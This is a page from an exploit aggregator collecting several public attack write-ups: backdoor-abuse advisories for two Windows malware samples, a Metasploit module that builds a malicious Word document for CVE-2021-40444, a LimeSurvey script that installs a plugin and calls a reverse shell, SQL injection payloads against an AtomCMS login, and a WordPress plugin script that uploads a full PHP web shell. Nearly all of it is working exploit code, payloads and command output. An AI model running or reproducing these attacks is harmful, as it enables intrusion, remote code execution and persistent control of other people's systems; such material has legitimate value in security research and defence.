Latest exploits :: CodePwn

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/434923afc32a7bc7355ed9a5224b9273.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Freddy.2001 Vulnerability: Authentication Bypass Command Execution Description: The malware listens on TCP port 19535. Third-party intruders who can reach an infected host can gain access using an empty password and run commands made available by the backdoor using TELNET. Type: PE32 MD5: 434923afc32a7bc7355ed9a5224b9273 Vuln ID: MVID-2022-0486 Dropped files: sycon2.exe Disclosure: 02/08/2022 Exploit/PoC: #Note: use TELNET telnet.exe x.x.x.x 19535 Enter password: User: Victim Computer net name: DESKTOP-2C3JQHO IP address: 192.168.18.129 Local date & time: 2/3/2022 2:45:46 AM Hackers connected: 2 $y(0n v.2.3.2 by Meerkat Systems | NLG Sycon> Sycon> windows Window 6976: dump Window 6976: tmp Window 1956: Administrator: Administrator Command Prompt Window 6976: Program Manager Sycon> cd \ CD: C:\ Sycon> dir Found: $Recycle.Bin Found: Boot Found: bootmgr Found: BOOTNXT etc... Sycon> exec calc Executing... Sycon> logoff Windows is going down... I'm killed! Sycon> Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super( update_info( info, 'Name' => 'Microsoft Office Word Malicious MSHTML RCE', 'Description' => %q{ This module creates a malicious docx file that when opened in Word on a vulnerable Windows system will lead to code execution. This vulnerability exists because an attacker can craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. }, 'References' => [ ['CVE', '2021-40444'], ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'], ['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'], ['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'], ['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'], ['URL', 'https://github.com/klezVirus/CVE-2021-40444'] ], 'Author' => [ 'lockedbyte ', # Vulnerability discovery. 'klezVirus ', # References and PoC. 'thesunRider', # Official Metasploit module. 'mekhalleh (RAMELLA Sébastien)' # Zeop-CyberSecurity - code base contribution and refactoring. ], 'DisclosureDate' => '2021-09-23', 'License' => MSF_LICENSE, 'Privileged' => false, 'Platform' => 'win', 'Arch' => [ARCH_X64], 'Payload' => { 'DisableNops' => true }, 'DefaultOptions' => { 'FILENAME' => 'msf.docx' }, 'Targets' => [ [ 'Hosted', {} ] ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [UNRELIABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true]) ]) register_advanced_options([ OptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]), ]) end def bin_to_hex(bstr) return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join) end def cab_checksum(data, seed = "\x00\x00\x00\x00") checksum = seed bytes = '' data.chars.each_slice(4).map(&:join).each do |dword| if dword.length == 4 checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*') else bytes = dword end end checksum = checksum.reverse case (data.length % 4) when 3 dword = "\x00#{bytes}" when 2 dword = "\x00\x00#{bytes}" when 1 dword = "\x00\x00\x00#{bytes}" else dword = "\x00\x00\x00\x00" end checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse end # http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf def create_cab(data) cab_cfdata = '' filename = "../#{File.basename(@my_resources.first)}.inf" block_size = 32768 struct_cffile = 0xd struct_cfheader = 0x30 block_counter = 0 data.chars.each_slice(block_size).map(&:join).each do |block| block_counter += 1 seed = "#{[block.length].pack('S')}#{[block.length].pack('S')}" csum = cab_checksum(block, seed) vprint_status("Data block added w/ checksum: #{bin_to_hex(csum)}") cab_cfdata << csum # uint32 {4} - Checksum cab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length cab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length cab_cfdata << block end cab_size = [ struct_cfheader + struct_cffile + filename.length + cab_cfdata.length ].pack('L<') # CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB) cab_header = "\x4D\x53\x43\x46" # uint32 {4} - Header (MSCF) cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null) cab_header << cab_size # uint32 {4} - Archive Length cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null) cab_header << "\x2C\x00\x00\x00" # uint32 {4} - Offset to the first CFFILE cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null) cab_header << "\x03" # byte {1} - Minor Version (3) cab_header << "\x01" # byte {1} - Major Version (1) cab_header << "\x01\x00" # uint16 {2} - Number of Folders cab_header << "\x01\x00" # uint16 {2} - Number of Files cab_header << "\x00\x00" # uint16 {2} - Flags cab_header << "\xD2\x04" # uint16 {2} - Cabinet Set ID Number cab_header << "\x00\x00" # uint16 {2} - Sequential Number of this Cabinet file in a Set # CFFOLDER cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder struct_cfheader + struct_cffile + filename.length ].pack('L<') cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder cab_header << "\x00\x00" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP) # increase file size to trigger vulnerability cab_header << [ # uint32 {4} - Uncompressed File Length ("\x02\x00\x5C\x41") data.length + 1073741824 ].pack('L<') # set current date and time in the format of cab file date_time = Time.new date = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S') time = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S') # CFFILE cab_header << "\x00\x00\x00\x00" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder) cab_header << "\x00\x00" # uint16 {2} - Folder ID (starts at 0) cab_header << date # uint16 {2} - File Date (\x5A\x53) cab_header << time # uint16 {2} - File Time (\xC3\x5C) cab_header << "\x20\x00" # uint16 {2} - File Attributes cab_header << filename # byte {X} - Filename (ASCII) cab_header << "\x00" # byte {1} - null Filename Terminator cab_stream = cab_header # CFDATA cab_stream << cab_cfdata end def generate_html uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab" inf = "#{File.basename(@my_resources.first)}.inf" file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js') js_content = ::File.binread(file_path) js_content.gsub!('REPLACE_INF', inf) js_content.gsub!('REPLACE_URI', uri) if datastore['OBFUSCATE'] print_status('Obfuscate JavaScript content') js_content = Rex::Exploitation::JSObfu.new js_content js_content = js_content.obfuscate(memory_sensitive: false) end html = '<!DOCTYPE html><html><head><meta http-equiv="Expires" content="-1"><meta http-equiv="X-UA-Compatible" content="IE=11"></head><body><script>' html += js_content.to_s html += '</script></body></html>' html end def get_file_in_docx(fname) i = @docx.find_index { |item| item[:fname] == fname } unless i fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}") end @docx.fetch(i)[:data] end def get_template_path datastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx') end def inject_docx document_xml = get_file_in_docx('word/document.xml') unless document_xml fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml') end document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels') unless document_xml_rels fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels') end uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html" @docx.each do |entry| case entry[:fname] when 'word/document.xml' entry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s) when 'word/_rels/document.xml.rels' entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', "mhtml:#{uri}!x-usc:#{uri}") end end end def normalize_uri(*strs) new_str = strs * '/' new_str = new_str.gsub!('//', '/') while new_str.index('//') # makes sure there's a starting slash unless new_str[0, 1] == '/' new_str = '/' + new_str end new_str end def on_request_uri(cli, request) header_cab = { 'Access-Control-Allow-Origin' => '*', 'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS', 'Cache-Control' => 'no-store, no-cache, must-revalidate', 'Content-Type' => 'application/octet-stream', 'Content-Disposition' => "attachment; filename=#{File.basename(@my_resources.first)}.cab" } header_html = { 'Access-Control-Allow-Origin' => '*', 'Access-Control-Allow-Methods' => 'GET, POST', 'Cache-Control' => 'no-store, no-cache, must-revalidate', 'Content-Type' => 'text/html; charset=UTF-8' } if request.method.eql? 'HEAD' if request.raw_uri.to_s.end_with? '.cab' send_response(cli, '', header_cab) else send_response(cli, '', header_html) end elsif request.method.eql? 'OPTIONS' response = create_response(501, 'Unsupported Method') response['Content-Type'] = 'text/html' response.body = '' cli.send_response(response) elsif request.raw_uri.to_s.end_with? '.html' print_status('Sending HTML Payload') send_response_html(cli, generate_html, header_html) elsif request.raw_uri.to_s.end_with? '.cab' print_status('Sending CAB Payload') send_response(cli, create_cab(@dll_payload), header_cab) end end def pack_docx @docx.each do |entry| if entry[:data].is_a?(Nokogiri::XML::Document) entry[:data] = entry[:data].to_s end end Msf::Util::EXE.to_zip(@docx) end def unpack_docx(template_path) document = [] Zip::File.open(template_path) do |entries| entries.each do |entry| if entry.name.match(/\.xml|\.rels$/i) content = Nokogiri::XML(entry.get_input_stream.read) if entry.file? elsif entry.file? content = entry.get_input_stream.read end vprint_status("Parsing item from template: #{entry.name}") document << { fname: entry.name, data: content } end end document end def primer print_status('CVE-2021-40444: Generate a malicious docx file') @proto = (datastore['SSL'] ? 'https' : 'http') if datastore['SRVHOST'] == '0.0.0.0' datastore['SRVHOST'] = Rex::Socket.source_address end template_path = get_template_path unless File.extname(template_path).match(/\.docx$/i) fail_with(Failure::BadConfig, 'Template is not a docx file!') end print_status("Using template '#{template_path}'") @docx = unpack_docx(template_path) print_status('Injecting payload in docx document') inject_docx print_status("Finalizing docx '#{datastore['FILENAME']}'") file_create(pack_docx) @dll_payload = Msf::Util::EXE.to_win64pe_dll( framework, payload.encoded, { arch: payload.arch.first, mixed_mode: true, platform: 'win' } ) end end </code></pre>

<pre><code># Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated) # Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login # Date: 05/12/2021 # Exploit Author: Y1LD1R1M # Vendor Homepage: https://www.limesurvey.org/ # Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip # Version: 5.2.x # Tested on: Kali Linux 2021.3 # Reference: https://github.com/Y1LD1R1M-1337/Limesurvey-RCE #!/usr/bin/python # -*- coding: utf-8 -*- import requests import sys import warnings from bs4 import BeautifulSoup warnings.filterwarnings("ignore", category=UserWarning, module='bs4') print("_______________LimeSurvey RCE_______________") print("") print("") print("Usage: python exploit.py URL username password port") print("Example: python exploit.py http://192.26.26.128 admin password 80") print("") print("") print("== ██╗ ██╗ ██╗██╗ ██████╗ ██╗██████╗ ██╗███╗ ███╗ ==") print("== ╚██╗ ██╔╝███║██║ ██╔══██╗███║██╔══██╗███║████╗ ████║ ==") print("== ╚████╔╝ ╚██║██║ ██║ ██║╚██║██████╔╝╚██║██╔████╔██║ ==") print("== ╚██╔╝ ██║██║ ██║ ██║ ██║██╔══██╗ ██║██║╚██╔╝██║ ==") print("== ██║ ██║███████╗██████╔╝ ██║██║ ██║ ██║██║ ╚═╝ ██║ ==") print("== ╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ==") print("") print("") url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] port = sys.argv[4] req = requests.session() print("[+] Retrieving CSRF token...") loginPage = req.get(url+"/index.php/admin/authentication/sa/login") response = loginPage.text s = BeautifulSoup(response, 'html.parser') CSRF_token = s.findAll('input')[0].get("value") print(CSRF_token) print("[+] Sending Login Request...") login_creds = { "user": username, "password": password, "authMethod": "Authdb", "loginlang":"default", "action":"login", "width":"1581", "login_submit": "login", "YII_CSRF_TOKEN": CSRF_token } print("[+]Login Successful") print("") print("[+] Upload Plugin Request...") print("[+] Retrieving CSRF token...") filehandle = open("/root/limesurvey/plugin/Y1LD1R1M.zip",mode = "rb") # CHANGE THIS login = req.post(url+"/index.php/admin/authentication/sa/login" ,data=login_creds) UploadPage = req.get(url+"/index.php/admin/pluginmanager/sa/index") response = UploadPage.text s = BeautifulSoup(response, 'html.parser') CSRF_token2 = s.findAll('input')[0].get("value") print(CSRF_token2) Upload_creds = { "YII_CSRF_TOKEN":CSRF_token2, "lid":"$lid", "action": "templateupload" } file_upload= req.post(url+"/index.php/admin/pluginmanager?sa=upload",files = {'the_file':filehandle},data=Upload_creds) UploadPage = req.get(url+"/index.php/admin/pluginmanager?sa=uploadConfirm") response = UploadPage.text print("[+] Plugin Uploaded Successfully") print("") print("[+] Install Plugin Request...") print("[+] Retrieving CSRF token...") InstallPage = req.get(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin") response = InstallPage.text s = BeautifulSoup(response, 'html.parser') CSRF_token3 = s.findAll('input')[0].get("value") print(CSRF_token3) Install_creds = { "YII_CSRF_TOKEN":CSRF_token3, "isUpdate": "false" } file_install= req.post(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin",data=Install_creds) print("[+] Plugin Installed Successfully") print("") print("[+] Activate Plugin Request...") print("[+] Retrieving CSRF token...") ActivatePage = req.get(url+"/index.php/admin/pluginmanager?sa=activate") response = ActivatePage.text s = BeautifulSoup(response, 'html.parser') CSRF_token4 = s.findAll('input')[0].get("value") print(CSRF_token4) Activate_creds = { "YII_CSRF_TOKEN":CSRF_token4, "pluginId": "1" # CHANGE THIS } file_activate= req.post(url+"/index.php/admin/pluginmanager?sa=activate",data=Activate_creds) print("[+] Plugin Activated Successfully") print("") print("[+] Reverse Shell Starting, Check Your Connection :)") shell= req.get(url+"/upload/plugins/Y1LD1R1M/php-rev.php") # CHANGE THIS </code></pre>

<pre><code># Exploit Title: AtomCMS v2.0 - SQLi # Date: 08/02/2022 # Exploit Author: Luca Cuzzolin aka czz78 # Vendor Homepage: https://github.com/thedigicraft/Atom.CMS # Version: v2.0 # Category: Webapps # Tested on: Debian linux # CVE : CVE-2022-24223 ==================================================== # PoC : SQLi : http://127.0.0.1/Atom.CMS/admin/login.php POST /Atom.CMS/admin/login.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: it,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 35 Origin: http://127.0.0.1 Connection: keep-alive Referer: http://127.0.0.1/Atom.CMS/admin/login.php Cookie: PHPSESSID=tqfebdu4kn9qj7g6qpa91j9859 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 email=test%40test.com&password=1234 Vulnerable Payload : Parameter: email (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=test@test.com' AND (SELECT 5613 FROM (SELECT(SLEEP(5)))JnLZ) AND 'pROE'='pROE&password=1234 Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: email=test@test.com' UNION ALL SELECT NULL,CONCAT(0x717a767a71,0x65557a784e446152424b63724b5a737062464a4267746c70794d5976484c484a5365634158734975,0x71627a7871),NULL,NULL,NULL,NULL-- -&password=1234 Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL-- - --- ==================================================== </code></pre>

<pre><code># Exploit Title: Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated) # Date 07.12.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://wordpress.org/plugins/catch-themes-demo-import/ # Software Link: https://downloads.wordpress.org/plugin/catch-themes-demo-import.1.6.1.zip # Version: <= 1.6.1 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-39352 # CWE: CWE-434 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39352/README.md ''' Description: The Catch Themes Demo Import WordPress plugin is vulnerable to arbitrary file uploads via the import functionality found in the ~/inc/CatchThemesDemoImport.php file, in versions up to 1.7, due to insufficient file type validation. This makes it possible for an attacker with administrative privileges to upload malicious files that can be used to achieve remote code execution. ''' # Banner: banner = """ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ||C |||V |||E |||- |||2 |||0 |||2 |||1 |||- |||3 |||9 |||3 |||5 |||2 || ||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|| |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\| [+] Catch Themes Demo Import RCE (Authenticated) [@] Developed by Ron Jost (Hacker5preme) """ print(banner) import argparse import requests from datetime import datetime # User-Input: my_parser = argparse.ArgumentParser(description='Wordpress Plugin Catch Themes Demo Import - RCE (Authenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('') print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('') # Authentication: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' check = session.get(auth_url) # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } auth = session.post(auth_url, headers=header, data=body) # Get Security nonce value: check = session.get('http://' + target_ip + ':' + target_port + wp_path+ 'wp-admin/themes.php?page=catch-themes-demo-import').text nonce = check[check.find('ajax_nonce"') + 13:] wp_nonce = nonce[:nonce.find('"')] print(wp_nonce) # Exploit: exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php' # Header (Exploit): header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0", "Accept": "*/*", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", 'Referer': 'http://' + target_ip + '/wordpress/wp-admin/themes.php?page=catch-themes-demo-import', "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------121585879226594965303252407916", "Origin": "http://" + target_ip, "Connection": "close" } # Exploit Payload (Using p0wny shell: https://github.com/flozz/p0wny-shell): shell_payload = "-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nctdi_import_demo_data\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n" + wp_nonce + "\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"selected\"\r\n\r\nundefined\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"content_file\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar- session.post(exploit_url, headers=header, data=shell_payload) print('[*] Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S'))) print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/' + str(datetime.now().strftime('%Y')) + '/' + str(datetime.now().strftime('%m')) + '/shell.php') print('') </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/29bc048d58ab8038c7001ef0d5e69c9b_B.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Prexot.a Vulnerability: Port Bounce Scan (MITM) Description: The malware listens on random high TCP ports e.g 11404, 19545, 17001, 10110 and accepts any credentials. Third-party intruders who successfully logon can abuse the backdoor FTP server as a man-in-the-middle machine allowing PORT Command bounce scan attacks using Nmap. This vulnerability allows remote attackers to abuse your system and discreetly conduct network port scanning. Victims will then think these scans are originating from the infected system running the afflicted malware FTP Server and not you. Type: PE32 MD5: 29bc048d58ab8038c7001ef0d5e69c9b Vuln ID: MVID-2022-0485 Dropped files: services.exe, mstempf.exe Disclosure: 02/08/2022 Exploit/PoC: nmap -n -Pn -b malvuln:malvuln@192.168.18.129:19545 -p21,22,80 192.168.18.237 -v Starting Nmap 7.80 ( https://nmap.org ) at 2022-02-07 15:45 UTC-11 Resolved FTP bounce attack proxy to 192.168.18.129 (192.168.18.129). Attempting connection to ftp://malvuln:malvuln@192.168.18.129:19545 Connected:220 Bot Server (Win32) Login credentials accepted by FTP server! Initiating Bounce Scan at 15:46 Attempting connection to ftp://malvuln:malvuln@192.168.18.129:19545 Connected:220 Bot Server (Win32) Login credentials accepted by FTP server! Discovered open port 80/tcp on 192.168.18.237 Completed Bounce Scan at 15:46, 10.39s elapsed (3 total ports) Nmap scan report for 192.168.18.237 Host is up. PORT STATE SERVICE 21/tcp closed ftp 22/tcp closed ssh 80/tcp open http Read data files from: C:\Program Files (x86)\Nmap Nmap done: 1 IP address (1 host up) scanned in 19.63 seconds Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>